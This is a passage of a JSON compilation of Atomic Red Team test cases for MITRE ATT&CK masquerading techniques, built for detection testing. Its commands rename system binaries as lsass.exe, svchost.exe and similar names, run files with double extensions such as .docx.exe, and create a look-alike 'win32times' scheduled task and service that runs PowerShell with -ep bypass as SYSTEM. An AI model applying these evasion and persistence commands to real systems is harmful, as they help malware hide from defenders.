%temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + }, + { + "command": "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.rtf.ps1 
/Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "source": "atomics/T1036.003/T1036.003.yaml", + "name": "Atomic Red Team Test - Masquerading: Rename System Utilities" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036.003", + "display_name": "Masquerading: Rename System Utilities", + "atomic_tests": [ + { + "name": "Masquerading as Windows LSASS process", + "auto_generated_guid": "5ba5a3d1-cf3c-4499-968a-a93155d1f717", + "description": "Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.\n\nUpon execution, cmd will be launched by powershell. 
If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %SystemRoot%\\System32\\cmd.exe %SystemRoot%\\Temp\\lsass.exe\n%SystemRoot%\\Temp\\lsass.exe /B\n", + "cleanup_command": "del /Q /F %SystemRoot%\\Temp\\lsass.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading as Linux crond process.", + "auto_generated_guid": "a315bfff-7a98-403b-b442-2ea1b255e556", + "description": "Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.\n\nUpon successful execution, sh is renamed to `crond` and executed.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "cp /bin/sh /tmp/crond;\necho 'sleep 5' | /tmp/crond\n", + "cleanup_command": "rm /tmp/crond\n", + "name": "sh" + } + }, + { + "name": "Masquerading - cscript.exe running as notepad.exe", + "auto_generated_guid": "3a2a578b-0a01-46e4-92e3-62e2859b42f0", + "description": "Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.\n\nUpon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y\ncmd.exe /c %APPDATA%\\notepad.exe /B\n", + "cleanup_command": "del /Q /F %APPDATA%\\notepad.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading - wscript.exe running as svchost.exe", + "auto_generated_guid": "24136435-c91a-4ede-9da1-8b284a1c1a23", + "description": "Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.\n\nUpon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy 
%SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y\ncmd.exe /c %APPDATA%\\svchost.exe /B\n", + "cleanup_command": "del /Q /F %APPDATA%\\svchost.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading - powershell.exe running as taskhostw.exe", + "auto_generated_guid": "ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa", + "description": "Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.\n\nUpon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y\ncmd.exe /K %APPDATA%\\taskhostw.exe\n", + "cleanup_command": "del /Q /F %APPDATA%\\taskhostw.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading - non-windows exe running as windows exe", + "auto_generated_guid": "bc15c13f-d121-4b1f-8c7d-28d95854d086", + "description": "Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe\n\nUpon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "outputfile": { + "description": "path of file to execute", + "type": "Path", + "default": "($env:TEMP + \"\\svchost.exe\")" + }, + "inputfile": { + "description": "path of file to copy", + "type": "Path", + "default": "PathToAtomicsFolder\\T1036.003\\bin\\T1036.003.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Exe file to copy must exist on disk at specified location (#{inputfile})\n", + "prereq_command": "if (Test-Path #{inputfile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 
\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe\" -OutFile \"#{inputfile}\"\n" + } + ], + "executor": { + "command": "copy #{inputfile} #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "cleanup_command": "Remove-Item #{outputfile} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Masquerading - windows exe running as different windows exe", + "auto_generated_guid": "c3d24a39-2bfe-4c6a-b064-90cd73896cb0", + "description": "Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "outputfile": { + "description": "path of file to execute", + "type": "Path", + "default": "($env:TEMP + \"\\svchost.exe\")" + }, + "inputfile": { + "description": "path of file to copy", + "type": "Path", + "default": "$env:ComSpec" + } + }, + "executor": { + "command": "copy #{inputfile} #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "cleanup_command": "Remove-Item #{outputfile} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Malicious process Masquerading as LSM.exe", + "auto_generated_guid": "83810c46-f45e-4485-9ab6-8ed0e9e6ed7f", + "description": "Detect LSM running from an incorrect directory and an incorrect service account\nThis works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\\ folder.\n\nUpon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\lsm.exe\nC:\\lsm.exe /c echo T1036.003 > C:\\T1036.003.txt\n", + "cleanup_command": "del C:\\T1036.003.txt >nul 2>&1\ndel C:\\lsm.exe >nul 2>&1\n", + "name": "command_prompt", + 
"elevation_required": true + } + }, + { + "name": "File Extension Masquerading", + "auto_generated_guid": "c7fa0c3b-b57f-4cba-9118-863bf4e653fc", + "description": "download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.\n\ne.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_path": { + "description": "path to exe to use when creating masquerading files", + "type": "Path", + "default": "C:\\Windows\\System32\\calc.exe" + }, + "vbs_path": { + "description": "path of vbs to use when creating masquerading files", + "type": "Path", + "default": "PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs" + }, + "ps1_path": { + "description": "path of powershell script to use when creating masquerading files", + "type": "Path", + "default": "PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1" + } + }, + "executor": { + "command": "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File 
%temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "cleanup_command": "del /f %temp%\\T1036.003_masquerading.docx.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.pdf.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.ps1.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.xls.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.xlsx.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.png.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.doc.ps1 > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.pdf.ps1 > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.rtf.ps1 > nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", 
+ "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1036.004", + "command_list": [ + "schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file c:\\T1036.004_NonExistingScript.ps1\" /tn win32times /f\nschtasks /query /tn win32times\n", + "sc create win32times binPath= \"cmd /c start c:\\T1036.004_NonExistingScript.ps1\"\nsc qc win32times\n" + ], + "commands": [ + { + "command": "schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file c:\\T1036.004_NonExistingScript.ps1\" /tn win32times /f\nschtasks /query /tn win32times\n", + "source": "atomics/T1036.004/T1036.004.yaml", + "name": "Atomic Red Team Test - Masquerading: Masquerade Task or Service" + }, + { + "command": "sc create win32times binPath= \"cmd /c start c:\\T1036.004_NonExistingScript.ps1\"\nsc qc win32times\n", + "source": "atomics/T1036.004/T1036.004.yaml", + "name": "Atomic Red Team Test - Masquerading: Masquerade Task or Service" + } + ], + "parsed_datasets": [ + { + 
"attack_technique": "T1036.004", + "display_name": "Masquerading: Masquerade Task or Service", + "atomic_tests": [ + { + "name": "Creating W32Time similar named service using schtasks", + "auto_generated_guid": "f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9", + "description": "Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed \"Operation Wocao\"", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file c:\\T1036.004_NonExistingScript.ps1\" /tn win32times /f\nschtasks /query /tn win32times\n", + "cleanup_command": "schtasks /tn win32times /delete /f\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Creating W32Time similar named service using sc", + "auto_generated_guid": "b721c6ef-472c-4263-a0d9-37f1f4ecff66", + "description": "Creating W32Time similar named service (win32times) using sc just like threat actor dubbed \"Operation Wocao\"", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "sc create win32times binPath= \"cmd /c start c:\\T1036.004_NonExistingScript.ps1\"\nsc qc win32times\n", + "cleanup_command": "sc delete win32times\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information 
about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + 
"target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job metadata", + "description": "Data and information that describe a scheduled job and activity around it.", + "source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + 
"description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + 
"source_data_element": "process", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "disabled", + "target_data_element": "scheduled job" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ] + ] + }, + { + "technique_id": "T1036.005", + "command_list": [ + "mkdir $HOME/...\ncp $(which sh) $HOME/...\n$HOME/.../sh -c \"echo Hello from the Atomic Red Team test T1036.005#1\"\n", + "Add-Type 
-TypeDefinition @'\npublic class Test {\n public static void Main(string[] args) {\n System.Console.WriteLine(\"tweet, tweet\");\n }\n}\n'@ -OutputAssembly \"$Env:windir\\Temp\\svchost.exe\"\n\nStart-Process -FilePath \"$Env:windir\\Temp\\svchost.exe\"\n" + ], + "commands": [ + { + "command": "mkdir $HOME/...\ncp $(which sh) $HOME/...\n$HOME/.../sh -c \"echo Hello from the Atomic Red Team test T1036.005#1\"\n", + "source": "atomics/T1036.005/T1036.005.yaml", + "name": "Atomic Red Team Test - Masquerading: Match Legitimate Name or Location" + }, + { + "command": "Add-Type -TypeDefinition @'\npublic class Test {\n public static void Main(string[] args) {\n System.Console.WriteLine(\"tweet, tweet\");\n }\n}\n'@ -OutputAssembly \"$Env:windir\\Temp\\svchost.exe\"\n\nStart-Process -FilePath \"$Env:windir\\Temp\\svchost.exe\"\n", + "source": "atomics/T1036.005/T1036.005.yaml", + "name": "Atomic Red Team Test - Masquerading: Match Legitimate Name or Location" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036.005", + "display_name": "Masquerading: Match Legitimate Name or Location", + "atomic_tests": [ + { + "name": "Execute a process from a directory masquerading as the current parent directory.", + "auto_generated_guid": "812c3ab8-94b0-4698-a9bf-9420af23ce24", + "description": "Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "test_message": { + "description": "Test message to echo out to the screen", + "type": "String", + "default": "Hello from the Atomic Red Team test T1036.005#1" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "mkdir $HOME/...\ncp $(which sh) $HOME/...\n$HOME/.../sh -c \"echo #{test_message}\"\n", + "cleanup_command": "rm -f $HOME/.../sh\nrmdir $HOME/.../\n" + } + }, + { + "name": "Masquerade as a built-in system executable", + 
"auto_generated_guid": "35eb8d16-9820-4423-a2a1-90c4f5edd9ca", + "description": "Launch an executable that attempts to masquerade as a legitimate executable.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_filepath": { + "description": "File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.", + "type": "String", + "default": "$Env:windir\\Temp\\svchost.exe" + } + }, + "executor": { + "command": "Add-Type -TypeDefinition @'\npublic class Test {\n public static void Main(string[] args) {\n System.Console.WriteLine(\"tweet, tweet\");\n }\n}\n'@ -OutputAssembly \"#{executable_filepath}\"\n\nStart-Process -FilePath \"#{executable_filepath}\"\n", + "cleanup_command": "Remove-Item -Path \"#{executable_filepath}\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image metadata", + "description": "Data and information that describe an image and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "image" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1036.006", + "command_list": [ + "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend 
